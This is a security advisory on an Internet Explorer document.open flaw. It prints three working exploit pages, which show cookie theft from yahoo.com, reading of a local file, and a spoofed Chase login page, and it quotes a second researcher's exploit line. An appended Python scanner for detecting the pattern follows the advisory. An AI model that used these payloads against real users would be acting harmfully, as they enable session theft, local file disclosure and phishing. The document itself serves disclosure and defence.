COMMAND

IE document.open method allows access to local files and cookies

SYSTEMS AFFECTED

Tested on:
IE 6.0.2600.0000 + Windows 2000 (update versions: Q312461, Q240308, Q313675)
IE 5.5 SP2 (IE 5.50.4807.2300)

PROBLEM

the Pull published [http://www.osioniusx.com]:

By simply using the document.open method and not using the document.close method you are able to: steal cookies; read local files that are parsable by IE (MIME type text/html, to be exact); and spoof sites.

Exploits on: http://www.osioniusx.com

"cookieStealing.html" - This opens Yahoo.com and steals the cookie.

<html>
<head>
<title>Cookie Stealing</title>
</head>
<body>
<P>This page shows how this bug can be used to steal cookies. For this example I use yahoo.com and a five second timeout (wait five seconds after the window opens). Cookie stealing can result in impersonation, stealing of Credit Card numbers, etc.
<script>
var y = document.open( "http://www.yahoo.com", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
setTimeout('alert(y.document.cookie);y.close();',5000);
</script>
</P>
</body>
</html>

"FileReading.html" - This opens up C:\test.txt and then reads it.

<html>
<head>
<title>File Reading</title>
</head>
<body>
This page shows local file reading with this bug. The file being read is c:\test.txt. This could be used to gather various types of passwords and other local information you do not want malicious, remote users to have.
<script>
var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
setTimeout('alert(y.document.body.innerHTML);y.close();',1000);
</script>
</body>
</html>

"SiteSpoofing.html" - This spoofs www.chase.com -- chase.com is in the URL and the title, and there is a link on the page to log on to your account which comes back to www.osioniusx.com.

<html>
<head>
<title>Web Site Spoofing</title>
</head>
<body>
<script>
s='<title>Chase</title>Chase Bank content could go here <br><br><a href=http://www.osioniusx.com/>LogOn To Your Bank Account</a>';
var y = document.open( "http://www.chase.com", "x", "status = yes, location = yes,resizable = yes, toolbar=yes, directories=yes,menubar=yes" );
setTimeout('y.document.write(s);',500);
</script>
</body>
</html>

Update by Rogan Dawes:

If you use an "https://" URL, it also shows THAT in the location bar. Naturally, there are no SSL indicators (padlock, Secure properties, etc.). For the paranoid among us (i.e. you have the alerts turned on), IE DOES warn that you are entering and then LEAVING a secure session, but the fact remains that the Location field shows "https://". It doesn't seem to work for documents containing frames, however. And you can get the logo to stop spinning by doing the document.close inside the timeout call. (If you look at the source of the spoofed page demo, you'll see what I mean.)

Update
======

Jelmer recently posted a similar exploit, and "the Pull" added:

Jelmer's:
extDoc = document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');

mine:
var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );

It doesn't matter if it is
cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';
that is able to read the code, or this:
setTimeout('alert(y.document.body.innerHTML);y.document.close();',1000);
-- they are just the same thing. (ref: http://www.osioniusx.com document.write() bug.)

Basically, the problem is that when the document.write() uses the window.open() method as described on the MSDN website for the method here:
http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/open_1.asp

SOLUTION

None yet.
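As an added example (not code from the advisory or from osioniusx.com), the following is a content-inspection check that a filtering proxy or mail gateway could run over page source to flag the pattern all three demos share: document.open() given window.open-style arguments (a URL-like first argument plus a window name) and the returned window handle then being read from or written to. The regexes, the Finding class and the sample page are constructed here; the sample mirrors the advisory's three patterns with placeholder hosts.

```python
import re
from dataclasses import dataclass, field

# window.open-style arguments handed to document.open(): a URL-like first
# argument (scheme or drive letter) followed by a window-name argument.
# Plain document.open() or document.open("text/html", "replace") does not match.
_DOC_OPEN = re.compile(
    r"""(?P<handle>[A-Za-z_$][\w$]*)\s*=\s*document\.open\(\s*
        (?P<q>['"])(?P<url>(?:https?:|file:|[A-Za-z]:[/\\])[^'"]*)(?P=q)\s*,\s*['"]""",
    re.VERBOSE | re.IGNORECASE,
)
_LOCAL = re.compile(r"(?:file:|[A-Za-z]:[/\\])", re.IGNORECASE)

@dataclass
class Finding:
    handle: str          # variable that receives the returned window
    url: str             # what document.open() was asked to load
    uses: list = field(default_factory=list)  # how the handle is used

def scan_document_open(html: str) -> list:
    """Return one Finding per document.open(url, name, ...) call, tagged with
    how the returned handle is used later in the same page."""
    findings = []
    for m in _DOC_OPEN.finditer(html):
        handle, url = m.group("handle"), m.group("url")
        h, tail = re.escape(handle), html[m.end():]
        uses = []
        if re.search(rf"\b{h}\.document\.cookie\b", tail):
            uses.append("cookie-read")      # cookie theft pattern
        if re.search(rf"\b{h}\.(?:document\.body\b|execScript\s*\()", tail):
            uses.append("content-read")     # reads the loaded document
        if re.search(rf"\b{h}\.document\.write\s*\(", tail):
            uses.append("content-write")    # site spoofing pattern
        if _LOCAL.match(url):
            uses.append("local-file")       # target is a local file
        findings.append(Finding(handle, url, uses))
    return findings

# Constructed sample page mirroring the advisory's three patterns.
SAMPLE = r'''<script>
var y = document.open( "http://www.example.com", "x", "width=400,height=400" );
setTimeout('alert(y.document.cookie);y.close();',5000);
var z = document.open( "c:/test.txt", "x", "width=400,height=400" );
setTimeout('alert(z.document.body.innerHTML);z.close();',1000);
var w = document.open( "https://bank.example/", "x", "status = yes" );
setTimeout('w.document.write(s);',500);
</script>'''
if __name__ == "__main__":
    for f in scan_document_open(SAMPLE):
        print(f.handle, f.url, f.uses)
```

The check is purely lexical, so obfuscated scripts can evade it; it is meant as a cheap first-pass signature for the exact idiom the advisory documents, not as a complete detector.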